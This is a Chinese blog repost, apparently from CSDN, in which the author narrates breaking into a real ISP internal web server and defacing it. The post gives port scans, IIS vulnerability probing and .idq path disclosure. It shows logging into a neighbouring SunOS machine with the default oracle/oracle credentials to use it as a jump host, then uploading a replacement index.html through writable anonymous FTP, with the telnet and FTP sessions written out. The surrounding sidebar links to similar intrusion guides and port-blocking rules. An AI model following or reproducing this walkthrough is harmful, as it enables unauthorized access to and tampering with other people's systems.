linux通过80端口系统入侵,【转】21和80端口的入侵

最新推荐文章于 2023-04-14 17:56:20 发布
最新推荐文章于 2023-04-14 17:56:20 发布
阅读量310 收藏
点赞数
文章标签: linux通过80端口系统入侵
这篇博客记录了一位网络安全爱好者的探索过程,他利用扫描工具发现了目标主机的多个开放端口和漏洞,包括FRONTPAGE和IIS的漏洞。通过跳板机和弱密码策略,他成功获得了对目标主机的FTP访问权限,并能够修改WEB页面。博客详细描述了利用IDQ漏洞发现网站目录结构,以及如何通过其他服务器作为跳板来规避未知IP限制的技巧。
摘要由CSDN通过智能技术生成

首先申明我并不是一个HACKER,只是一个网络安全爱好者罢了。入侵的动机我保留,只记述过程啦!

目标主机:10.75.166.12(我的ISP的真实内部地址)。

目的:更改其WEB页,还有别的么?呵呵我保留!

首先:看看这个网段都有那些机子,还有他们都开什么端口吧!我用scanner(很好的扫描工具)

查出有N部机子。(其实我早就扫过了,呵呵),哈10.75.166.12只开了21,80 两个端口呀!

先FTP上去罗,ftp 10.75.166.12

unknown ip (10.75.167.87)

connected refused

呵呵,拒绝不知名的IP地址的联接!faint...该死的网管!

telnet 10.75.166.12 80

从80端口TELNET进去后会出现一段提示,发现该主机用的是MS-IIS!呵呵漏洞好象蛮多的!

IIS5.0有个unicode字符集的漏洞,浏览器吧%c1%2f之类的字符解释成""或“/”之类!

可以访问一些系统目录在用CMD。EXE可以执行一些程序,或可提交一些ASP文件。具体的方法或原理

请自己去找资料学习!我么?没用到这个漏洞!那么这台机子都有那些漏洞呢?用twwwscan(超好的web

漏洞扫描软件,是DOS界面的用BORLAND C++写的,超cool)

废话少说,twwwscan 10.75.166.12

哦,,,漏洞真不少。呵呵。有如下几个:

frontpage的_vti_inf.html

newdsn.exe

anything.idq

....

OH!THAT IS ENOUGH!第一个嘛,我们知道它是FRONTPAGE予留的一个HTML文件,没什么用!

第二个嘛, 可在目录生成MDB文件,用于D.O.S攻击,把它的硬盘塞满么!!呵呵!对我来说没有价值

第三个嘛,wow, *.idq这个漏洞我在灌水!棒,在浏览器上输入任何后缀为IDQ的文件,一般会返回一个类似

: "c:wwwrootshit.idq"not found!

呵呵原来网站放在wwwroot下!

现在问题是10.75.166.12不支持UNKNOW IP!我都要忍不住骂人了!!!

看看刚才扫描过的网段,一个一个telnet再ftp(若开了相应的端口的话)上去,看看有没有

什么默认帐号,(若没有也不要急,小榕的流光2001来看看有没有弱密码用户)

我还是比较幸运的10.75.166.11的21,23端口都开,而且都用SUNOS呵呵!

我们知到默认的用户oracle的密码还是oracle。可以用10.75.166.11做跳板了!

笨网管!!!!别怪我了!

telnet 10.75.166.11

login:oracle

password:

welcome!

SUNOS

you have a mail!

oracle@10.75.166.11>

登陆先看看有没有root!

oracle@10.75.166.11>who

哇,没有!COOL!该你倒霉!

oracle@10.75.166.11>ftp 10.75.166.12

ok!connected from 10.75.166.11

10.75.166.12 IIS

login:ftp(先试试匿名登陆的权限么!)

passwd:ftp@shit.com

ok!XXXX LOGGED IN

FTP>

没忘把,刚才用*.idq得到的WWWROOT目录!

FTP>CD WWWROOT

FTP>LS

.

.

.

FTP>

呵呵!看到了INDEX.HTML了!YEAH!!!笨网管,竟然允许匿名访问这么重要的目录!

FTP>bye

BYE-BYE罗!

oracle@10.75.166.11>

再看看权限如何:随便PUT一个文件看看可不可写!别忘了再删掉(其实也不用,看你的良心了)

YEAH!可写呀!!撞大运了!真该今天去买体育彩票!

接下来,把做好的INDEX.HTML先传到10.75.166.11的目录下!(用FTP连到10.75.166.11再用ORACLE

帐户登陆,因为要用10.75.166.11做跳板)

刚才的TELNET进程没关把!好!看看!

oracle@10.75.166.11>ls

好呀!传上来了有INDEX.HTML文件耶!!

接下来,是个人就会了!

oracle@10.75.166.11>ftp 10.75.166.12

ftp>put index.html

ok!

231byte transported

ftp>bye

下面去看看自HACK的页面吧!

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/11411056/viewspace-734405/,如需转载,请注明出处,否则将追究法律责任。

weixin_39672011
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
只开80端口主机的入侵思路
weixin_34395205的博客
04-23 8576
只开80端口主机的入侵思路 主机配置:win2kserver(sp3)+sygate personal firewall pro 安全设置:不说啦太**了竟然只允许80进 扫描:先用x-scan2.3扫端口晕只开80,然后又扫了一遍 唉还是一样的结果,看来管理员也不算笨啊! 检查系统洞洞:先ping了一下竟然ping不通,不过有刚才的扫描结果就很明 白了应是iis5再加上网页上明显用的asp...
新思路批量80端口入侵
08-03
准备工具:ShowIP.exe (较全的IP数据库) S.exe (端口扫描器,因为它速度快所以我建议大家用这个) Domain3.5 (明小子的旁注工具)
80与8080端口入侵
11-10
80与8080端口入侵实80与8080
80端口攻击_「网络安全」常见攻击篇(6)——木马攻击
weixin_39846612的博客
11-08 2674
什么是木马攻击?木马指的是隐藏在正常程序中的一段具有特殊功能的代码,实质上是一种远程控制软件,是一种未经授权,利用网络欺骗或者攻击的手段装入目标计算机中。木马用表面的有趣的、有用的功能来吸引人,但实际上暗含一些不为人知的功能,如复制文件、删除文件、修改计算机配置、浏览文件等。木马通常有两个可执行的程序:一个是客户端,一个是服务端。黑客电脑上安装客户端,目标对象电脑上安装服务端,黑客在远端操作目标对...
Linux下基于Snort入侵检测系统的研究及实现.pdf
09-06
本文主要介绍了基于Snort的入侵检测系统Linux操作系统下的研究和实现。入侵检测系统(Intrusion Detection System,简称IDS)是用来检测对计算机系统或网络系统非法攻击的安全防护技术,提供了对内部攻击、外部...
nids.rar_NIDS_nids-base_入侵检测 linux_入侵检测系统_网络入侵检测
09-24
在“nids.rar_NIDS_nids-base_入侵检测_linux_入侵检测系统_网络入侵检测”这个压缩包中,包含了一个基于C语言实现的简单NIDS项目。 **NIDS的类型与工作原理** NIDS通常分为两种类型:基于主机的HIDS(Host-based ...
Linux入侵检测方法及系统安全建议.pdf
09-06
Linux入侵检测方法及系统安全建议主要关注的是保护Linux操作系统免受恶意攻击和保障系统稳定运行。随着信息技术的快速发展,Linux因其开源、稳定和高效的特点,成为许多业务系统的基础平台,尤其是气象部门。然而,...
Linux入侵排查.docx
05-07
Linux 入侵排查 Linux 入侵排查是指在 ...Linux 入侵排查需要对系统进行逐步检查和分析,包括账号安全、历史命令、异常端口和异常进程等方面,以检测和处理可能的入侵行为,保护企业的网络信息系统和减少经济损失。
面向Linux系统管理员:企业端口扫描实战
01-09
 对于位于网络中的计算机系统来说,一个端口是一个潜在的通信通道,也是一个入侵通道。对目标计算机进行端口扫描,能得到许多有用的信息从而发现系统的安全漏洞。通过其可以使系统用户了解系统目前向外界提供了...
黑客常用端口利用总结
qq_43233085的博客
11-06 1370
黑客常用端口利用总结21:ftp/tftp/vsftpd文件传输协议22:ssh远程连接23:Telnet远程连接25/465:SMTP邮件服务53:DNS域名解析系统80/443:http/https135:DCOM服务139/445:Samba服务1433/1434:SQL Server服务1521:Oracle2049:NFS服务3306:mysql3389:Rdp远程桌面链接4899:ra...
linux怎么利用端口攻击,Linux 常见攻击端口封杀表
weixin_35215870的博客
05-09 140
该楼层疑似违规已被系统折叠隐藏此楼查看此楼# Vi /etc/sysconfig/iptables# INPUT-A INPUT -p tcp --dport 135 -j REJECT-A INPUT -p udp --dport 135 -j REJECT-A INPUT -p tcp --dport 136 -j REJECT-A INPUT -p udp --dport 136 -j R...
当服务器被黑客攻击时,如何查找溯源?
qq_780662763的博客
05-29 3130
现在国内互联网环境复杂,网络攻击事件频发,大部分互联网企业都有被网络攻击的经历。当互联网公司遭到网络攻击时,直接导致在线业务瘫痪,给企业造成巨大的经济损失。建议互联网企业提前做好安全防护措施,避免因遭到网络攻击导致企业经济损失。 当服务器遭到攻击时,可能会导致服务器被攻击者远程控制,服务器的带宽向外发包,服务器被DDoS/CC攻击,系统中木马病毒,服务器管理员账号密码被改等。还有可能导致网站被劫持,首页被篡改,网页被植入脚本木马等。当服务器被黑客攻击时,该如何去查找溯源呢? 首先我们要检查我们服务器的管理
端口入侵教程
FrancisGief的专栏
07-08 2702
请下载附件 注,本教程并非本人编写,代理帮朋友载若载请联系QQ2825385813
只开80端口主机的入侵思路 (zz)
afxid的专栏
06-04 4837
主机配置:win2kserver(sp3)+sygate personal firewall pro 安全设置:不说啦太变态了竟然只允许80进 扫描:先用x-scan2.3扫端口晕只开80,然后又扫了一遍 唉还是一样的结果,看来管理员也不算笨啊! 检查系统洞洞:先ping了一下竟然ping不通,不过有刚才的扫描结果就很明 白了应是iis5再加上网页上明显用的asp这样的主机当然是win2k不用 说
常见端口对应服务及入侵方式
爱是与世界平行
03-13 3142
常见端口对应服务及入侵方式一、端口服务及利用简析1.1 文件共享服务端口1.2 远程连接服务端口1.3 Web应用服务端口1.4 数据库端口服务1.5 邮件服务端口1.6 网络常见协议端口1.7 特殊服务端口二、端口入侵详情2.1 21端口入侵2.2 23端口入侵2.3 53端口入侵2.4 80端口入侵2.5 135端口入侵2.6 139/445端口入侵2.7 1433端口入侵2.8 1521端口...
CentOS7下 安装tomcat7
vicroad2014的专栏
12-05 514
1、下载tomcat http://tomcat.apache.org/download-70.cgi Core: tar.gz (pgp, md5) 2、安装tomcat [root@localhost tools]# tar -zxf apache-tomcat-7.0.57.tar.gz [root@localhost tools]# mv
80端口是什么服务使用的?80端口和443端口是默认开启的吗?
驰网飞飞的博客
04-14 2734
一台服务器能提供的服务有很多,比如HTTP、FTP、Telnet等服务。为什么可以同时提供那么多服务呢?有一个很重要的原因是采用不同的端口分别提供不同的服务,比如:TCP/IP协议规定web默认80端口,FTP默认21端口等。通过不同端口,计算机可以与外界进行互不干扰的通信。
Linux怎么查看端口是否被入侵
最新发布
06-08
要查看Linux系统上的端口是否被入侵,可以使用以下命令: 1. netstat命令:用于显示网络状态信息,包括网络连接、路由表、接口状态等。可以使用以下命令来查看当前开放的端口: ``` netstat -an | grep LISTEN ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值